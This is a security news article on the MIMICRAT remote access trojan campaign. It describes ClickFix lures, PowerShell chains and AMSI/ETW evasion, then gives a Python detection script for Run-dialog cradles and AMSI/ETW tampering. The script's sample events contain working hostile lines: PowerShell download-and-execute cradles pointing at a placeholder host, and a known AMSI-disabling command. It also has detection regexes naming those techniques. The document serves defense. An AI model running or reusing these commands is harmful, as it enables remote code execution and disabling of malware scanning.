MIMICRAT: the RAT that is camouflaged in legitimate sites and operates in memory to take control of your systems

Published, 5 min read

Cybersecurity researchers have brought to light a sophisticated campaign that abuses compromised legitimate websites to distribute a previously undocumented remote access trojan named MIMICRAT (also known as AstarionRAT). The most recent analysis by Elastic Security Labs details how the attackers combine social engineering, PowerShell chains and in-memory payloads to gain persistence and remote control over Windows machines; the full report on the Elastic site includes the relevant indicators and telemetry: Elastic Security Labs - MIMICRAT.

The intrusion begins very discreetly: legitimate pages are modified to serve malicious code which, in turn, loads externally hosted scripts. In the case documented by Elastic, the affected service was bincheck[.]io, a BIN (Bank Identification Number) validation site. The injected JavaScript redirects the victim to a PHP script that imitates a Cloudflare verification page and convinces the user to copy and paste a command into the Windows Run dialog. This simple gesture triggers a PowerShell chain that contacts a command and control (C2) server to download the next stage of the attack.


The sophistication of the chain is notable: the second PowerShell script does not merely run code; it alters the system's behavior to evade detection. Among the documented actions are manipulations aimed at Windows event telemetry and Microsoft's anti-malware interface, known respectively as ETW (Event Tracing for Windows) and AMSI (Antimalware Scan Interface). Both mechanisms are precisely the defenses that would otherwise observe the payload, so the operators neutralize them before it runs; Microsoft maintains technical documentation on both components: ETW and AMSI.

Once these barriers are undermined, the process delivers a loader written in Lua that decrypts and runs shellcode directly in memory. That shellcode finally installs the MIMICRAT agent, which communicates with its C2 over HTTPS on port 443. The choice of HTTPS and the emulation of traffic patterns typical of web analytics tools make it easier for the malicious traffic to blend in with legitimate communications.

From a functional point of view, MIMICRAT is a custom piece of software written in C++ that offers a wide range of post-exploitation capabilities. These include Windows token impersonation to escalate privileges, the creation of SOCKS5 tunnels for routing traffic, and an extensive command set, about 22 commands according to Elastic, covering process and file system control, access to an interactive shell, shellcode injection and proxy functionality. It is, in essence, a fairly complete kit for lateral movement, stealth and exfiltration.

Another relevant aspect of the attack is its international character and mass targeting: the lure shown to victims is dynamically localized into 17 different languages, so that the decoy adapts to the browser's language and increases the likelihood of deception. The victims identified by the researchers range from academic institutions in the United States to users of Chinese-speaking forums, which points to an opportunistic campaign with wide geographical scope.

The traces observed by Elastic also coincide, in tactics and infrastructure, with separate research published by Huntress describing ClickFix campaigns that use the Matanbuchus 3.0 loader as a bridge to the same type of RAT. For additional analysis and operational context, Huntress's research page contains technical articles and detection examples: Huntress - Blog.


What is the attacker after? Although the final intention cannot always be stated with complete certainty, all the elements of the attack (the ability to establish tunnels, to manipulate tokens, to execute arbitrary commands and to hide communications) fit the typical objectives of ransomware or mass data theft. In other incidents with similar patterns, actors have used initial access to deploy destructive payloads or to channel large volumes of information out of the compromised network.

For organizations and users the lessons are clear and should be applied as a priority: distrust any instruction that asks you to copy and paste commands into a console or into the Run dialog, review the integrity of third-party sites used as recurring services, and strengthen endpoint detection with monitoring solutions that look for abnormal behavior, not just signatures. In addition, protecting the mechanisms that attackers seek to manipulate, such as ETW and AMSI, and keeping visibility of processes that download executables or inject into memory are critical elements of defense. To better understand what a RAT is and why they are so dangerous, reference resources such as the Kaspersky threat center are useful: Kaspersky - Remote Access Trojans.
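The two detection opportunities described above, the Run-dialog paste that spawns a PowerShell download cradle and the later tampering with AMSI and ETW, can be turned into simple behavioral rules. The following is an added example written for this page, not code or indicators from the Elastic or Huntress reports. It runs over a handful of constructed, hypothetical telemetry records (process-creation events and PowerShell script-block log entries, with example.invalid as a placeholder host) and relies on two facts that do not depend on this campaign: the Windows Run dialog is hosted by explorer.exe, so a pasted command appears as a shell spawned directly by explorer.exe, and the well-known strings used to patch AMSI or ETW from PowerShell (AmsiScanBuffer, amsiInitFailed, EtwEventWrite and similar) survive in script-block logging even when the command line itself was base64-encoded. The rule names and event layout are this example's own assumptions.

```python
import base64
import re

# Constructed sample telemetry (hypothetical, not indicators from the Elastic
# report): simplified process-creation records and PowerShell script-block
# log entries, as an EDR or Sysmon/PowerShell logging pipeline might emit them.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr https://example.invalid/s.php | iex"'},
    {"id": 2, "type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe"},
    {"id": 3, "type": "scriptblock",
     "text": "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
             ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"},
    {"id": 4, "type": "scriptblock", "text": "Get-Process | Where-Object CPU -gt 10"},
    {"id": 5, "type": "process", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     # -EncodedCommand takes the base64 of the UTF-16LE script text
     "cmdline": "pwsh -enc " + base64.b64encode(
         "IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/x')"
         .encode("utf-16le")).decode()},
]

# Interpreters commonly launched from the Run dialog by ClickFix-style lures.
RUN_DIALOG_SHELLS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Download cradles and "hide the window" switches typical of a pasted one-liner.
CRADLE_RE = re.compile(
    r"(?i)(?:\b(?:iwr|irm|iex|invoke-webrequest|invoke-restmethod|invoke-expression"
    r"|downloadstring|downloadfile)\b|-w(?:indowstyle)?\s+hidden\b|-e(?:nc|ncodedcommand)?\s)")

# Well-known strings used when patching AMSI or ETW from PowerShell.
AMSI_ETW_RE = re.compile(
    r"(?i)(?:amsiscanbuffer|amsiinitfailed|amsiutils|amsi\.dll|etweventwrite|psetwlogprovider)")

ENC_RE = re.compile(r"(?i)-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmdline: str) -> str:
    """Return the plaintext of a -EncodedCommand argument, or "" if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return ""


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the names of the rules an event triggers (empty list if none)."""
    hits = []
    if event["type"] == "process":
        # The Run dialog is hosted by explorer.exe, so a pasted command shows up
        # as a shell spawned directly by explorer.exe carrying a download cradle.
        text = event["cmdline"] + " " + decode_encoded_command(event["cmdline"])
        if (_basename(event["parent"]) == "explorer.exe"
                and _basename(event["image"]) in RUN_DIALOG_SHELLS
                and CRADLE_RE.search(text)):
            hits.append("clickfix_run_dialog_cradle")
        if AMSI_ETW_RE.search(text):
            hits.append("amsi_etw_tamper")
    elif event["type"] == "scriptblock":
        # Script-block logging (event 4104) records the script text even when the
        # command line was encoded, which is where AMSI/ETW patching usually shows.
        if AMSI_ETW_RE.search(event["text"]):
            hits.append("amsi_etw_tamper")
    return hits


def analyze(events: list) -> dict:
    """Map event id -> triggered rules for every event that matched something."""
    findings = {}
    for event in events:
        hits = classify(event)
        if hits:
            findings[event["id"]] = hits
    return findings


if __name__ == "__main__":
    for event_id, rules in analyze(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(rules)}")
```

On the sample set, events 1 and 5 trigger the Run-dialog rule (event 5 only because the -EncodedCommand argument is decoded before matching) and event 3 triggers the AMSI/ETW rule; the benign notepad launch and the harmless script block produce nothing. In production the same logic belongs in the SIEM or EDR query language rather than a script, and the parent-process condition is what keeps the rule quiet on ordinary administrative PowerShell use.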

Campaigns of this nature reveal two realities: attackers prefer to exploit the trust that people place in legitimate services, and traditional defenses may not be enough when the attack chain runs in memory and avoids signatures. The response requires both technical actions (encrypted traffic monitoring, network segmentation, endpoint hardening and process anomaly detection) and organizational measures that reduce the risk of a user running dangerous commands. The Elastic report provides indicators and techniques that can help with detection and remediation; reviewing it and correlating it with internal records is a good first step for any security team.
